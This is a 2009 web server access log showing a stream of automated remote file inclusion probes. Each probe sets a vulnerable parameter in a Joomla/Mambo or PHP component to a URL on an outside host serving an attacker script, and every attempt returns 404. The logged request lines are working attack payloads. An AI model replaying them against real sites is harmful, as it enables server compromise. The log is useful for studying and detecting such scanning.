88.40.90.61 - - [30/May/2009:06:37:35 -0500] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://10thplanet.com/playlist/scan/httpd.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.40.90.61 - - [30/May/2009:06:37:36 -0500] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://10thplanet.com/playlist/scan/httpd.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.40.90.61 - - [30/May/2009:06:38:05 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://10thplanet.com/playlist/scan/httpd.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
88.40.90.61 - - [30/May/2009:06:38:06 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://10thplanet.com/playlist/scan/httpd.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
68.109.233.157 - - [30/May/2009:06:39:41 -0500] "GET //skin/zero_vote/error.php?dir=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
68.109.233.157 - - [30/May/2009:06:39:41 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.shipdesign.co.kr/id????? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
64.6.231.215 - - [30/May/2009:06:42:39 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
64.6.231.215 - - [30/May/2009:06:42:40 -0500] "GET /logs/access_log.1241049600/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
64.6.231.215 - - [30/May/2009:06:42:40 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
64.6.231.215 - - [30/May/2009:06:42:44 -0500] "GET /logs/access_log.1237248000/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
64.6.231.215 - - [30/May/2009:06:43:03 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
64.6.231.215 - - [30/May/2009:06:43:03 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
64.6.231.215 - - [30/May/2009:06:43:03 -0500] "GET /logs/access_log.1241049600/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
64.6.231.215 - - [30/May/2009:06:43:13 -0500] "GET /logs/access_log.1237248000/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
193.231.42.152 - - [30/May/2009:06:45:39 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
193.231.42.152 - - [30/May/2009:06:45:39 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
80.237.146.58 - - [30/May/2009:06:46:04 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
80.237.146.58 - - [30/May/2009:06:46:04 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
80.237.146.58 - - [30/May/2009:06:46:04 -0500] "GET /logs/access_log.1241049600/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
80.237.146.58 - - [30/May/2009:06:46:15 -0500] "GET /logs/access_log.1237248000/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
193.231.42.152 - - [30/May/2009:06:46:17 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
193.231.42.152 - - [30/May/2009:06:46:17 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
60.249.255.172 - - [30/May/2009:06:47:25 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
60.249.255.172 - - [30/May/2009:06:47:25 -0500] "GET /phphtml.php?htmlclass_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
60.249.255.172 - - [30/May/2009:06:47:25 -0500] "GET /logs/access_log.1240790400/phphtml.php?htmlclass_path=http://www.szolnokmegye.hu/plugins/p2000_sponsor_manager/fx29id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
193.231.42.152 - - [30/May/2009:06:49:23 -0500] "GET /logs//include.php?path[docroot]=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
193.231.42.152 - - [30/May/2009:06:49:24 -0500] "GET //include.php?path[docroot]=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
193.231.42.152 - - [30/May/2009:06:49:24 -0500] "GET /logs//include.php?path[docroot]=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
193.231.42.152 - - [30/May/2009:06:49:24 -0500] "GET //include.php?path[docroot]=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
85.18.117.101 - - [30/May/2009:06:52:05 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
85.18.117.101 - - [30/May/2009:06:52:05 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
85.18.117.101 - - [30/May/2009:06:52:05 -0500] "GET /logs/access_log.1239753600//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
85.18.117.101 - - [30/May/2009:06:52:05 -0500] "GET /logs/access_log.1239494400//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
203.94.155.59 - - [30/May/2009:06:52:24 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
203.94.155.59 - - [30/May/2009:06:52:32 -0500] "GET /logs/access_log.1241049600/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
203.94.155.59 - - [30/May/2009:06:52:32 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
203.94.155.59 - - [30/May/2009:06:52:32 -0500] "GET /logs/access_log.1237248000/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
91.195.124.9 - - [30/May/2009:06:53:38 -0500] "GET /logs//themes/header.php?theme_directory=http://www.radekoncar.ru///administrator/components/com_virtuemart/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.822"
91.195.124.9 - - [30/May/2009:06:53:38 -0500] "GET //themes/header.php?theme_directory=http://www.radekoncar.ru///administrator/components/com_virtuemart/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.822"
72.18.148.82 - - [30/May/2009:06:53:56 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:06:53:56 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:06:53:56 -0500] "GET /logs/access_log.1242086400/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:06:53:56 -0500] "GET /logs/access_log.1242259200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
67.202.24.212 - - [30/May/2009:06:54:23 -0500] "GET /logs//admin/global.php?config[installdir]=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.812"
67.202.24.212 - - [30/May/2009:06:54:23 -0500] "GET //admin/global.php?config[installdir]=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.812"
66.249.65.36 - - [30/May/2009:06:54:48 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.36 - - [30/May/2009:06:54:48 -0500] "GET /logs/access_log.1137888000 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
61.81.17.108 - - [30/May/2009:06:56:26 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
61.81.17.108 - - [30/May/2009:06:56:27 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
61.81.17.108 - - [30/May/2009:06:56:27 -0500] "GET /logs/access_log.1242518400/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
61.81.17.108 - - [30/May/2009:06:56:49 -0500] "GET /logs/access_log.1242086400/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
64.6.231.215 - - [30/May/2009:06:57:28 -0500] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 363 "-""libwww-perl/5.65"
64.6.231.215 - - [30/May/2009:06:57:28 -0500] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.65"
64.6.231.215 - - [30/May/2009:06:57:35 -0500] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 363 "-""libwww-perl/5.65"
64.6.231.215 - - [30/May/2009:06:57:35 -0500] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.65"
64.6.231.215 - - [30/May/2009:06:57:42 -0500] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 363 "-""libwww-perl/5.65"
64.6.231.215 - - [30/May/2009:06:57:42 -0500] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.65"
64.6.231.215 - - [30/May/2009:06:57:43 -0500] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 363 "-""libwww-perl/5.65"
64.6.231.215 - - [30/May/2009:06:57:43 -0500] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.65"
64.6.231.215 - - [30/May/2009:06:57:46 -0500] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 363 "-""libwww-perl/5.65"
64.6.231.215 - - [30/May/2009:06:57:46 -0500] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.65"
64.6.231.215 - - [30/May/2009:06:57:47 -0500] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 363 "-""libwww-perl/5.65"
64.6.231.215 - - [30/May/2009:06:57:47 -0500] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.65"
88.40.90.61 - - [30/May/2009:06:58:13 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://10thplanet.com/playlist/scan/httpd.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
76.73.56.159 - - [30/May/2009:06:58:52 -0500] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:58:56 -0500] "GET /logs/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:58:56 -0500] "GET /logs/access_log.1238371200/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 352 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:06:58:56 -0500] "GET /logs/access_log.1239235200/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 352 "-""Mozilla/5.0"
193.231.42.152 - - [30/May/2009:06:58:59 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
193.231.42.152 - - [30/May/2009:06:58:59 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
193.231.42.152 - - [30/May/2009:06:59:04 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
193.231.42.152 - - [30/May/2009:06:59:04 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
61.81.17.108 - - [30/May/2009:06:59:05 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
61.81.17.108 - - [30/May/2009:06:59:07 -0500] "GET /logs/access_log.1242518400/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
61.81.17.108 - - [30/May/2009:06:59:09 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
61.81.17.108 - - [30/May/2009:06:59:24 -0500] "GET /logs/access_log.1242086400/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
195.34.78.110 - - [30/May/2009:07:02:17 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
195.34.78.110 - - [30/May/2009:07:02:17 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
195.34.78.110 - - [30/May/2009:07:02:17 -0500] "GET /logs/access_log.1241049600/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
195.34.78.110 - - [30/May/2009:07:02:35 -0500] "GET /logs/access_log.1237248000/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
195.34.78.110 - - [30/May/2009:07:02:43 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
195.34.78.110 - - [30/May/2009:07:02:43 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
195.34.78.110 - - [30/May/2009:07:02:43 -0500] "GET /logs/access_log.1241049600/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
195.34.78.110 - - [30/May/2009:07:02:56 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
195.34.78.110 - - [30/May/2009:07:02:57 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
195.34.78.110 - - [30/May/2009:07:02:57 -0500] "GET /logs/access_log.1241049600/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
195.34.78.110 - - [30/May/2009:07:03:01 -0500] "GET /logs/access_log.1237248000/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
121.173.130.41 - - [30/May/2009:07:03:11 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
121.173.130.41 - - [30/May/2009:07:03:11 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
121.173.130.41 - - [30/May/2009:07:03:11 -0500] "GET /logs/access_log.1241049600/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
195.34.78.110 - - [30/May/2009:07:03:15 -0500] "GET /logs/access_log.1237248000/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
121.173.130.41 - - [30/May/2009:07:03:24 -0500] "GET /logs/access_log.1237248000/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:06:33 -0500] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:06:33 -0500] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 353 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:06:33 -0500] "GET /logs/access_log.1239321600/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 375 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:06:33 -0500] "GET /logs/access_log.1242000000/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 375 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:07:43 -0500] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:07:43 -0500] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 353 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:07:43 -0500] "GET /logs/access_log.1239321600/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 375 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:08:27 -0500] "GET /logs/access_log.1235952000/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 375 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:07:09:12 -0500] "GET /index.php?meio=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:07:09:12 -0500] "GET /logs/index.php?meio=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:07:09:12 -0500] "GET /logs/access_log.1242086400/index.php?meio=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:07:09:12 -0500] "GET /logs/access_log.1239753600/index.php?meio=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:10:16 -0500] "GET /logs/access_log.1242259200/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 380 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:10:16 -0500] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 358 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:10:16 -0500] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 353 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:11:00 -0500] "GET /logs/access_log.1242000000/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 380 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:11:09 -0500] "GET /logs/access_log.1240358400/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 380 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:07:13:42 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:07:13:42 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:07:13:42 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:07:13:42 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
193.231.42.152 - - [30/May/2009:07:15:06 -0500] "GET /logs/index.php?meio=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
193.231.42.152 - - [30/May/2009:07:15:06 -0500] "GET /index.php?meio=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
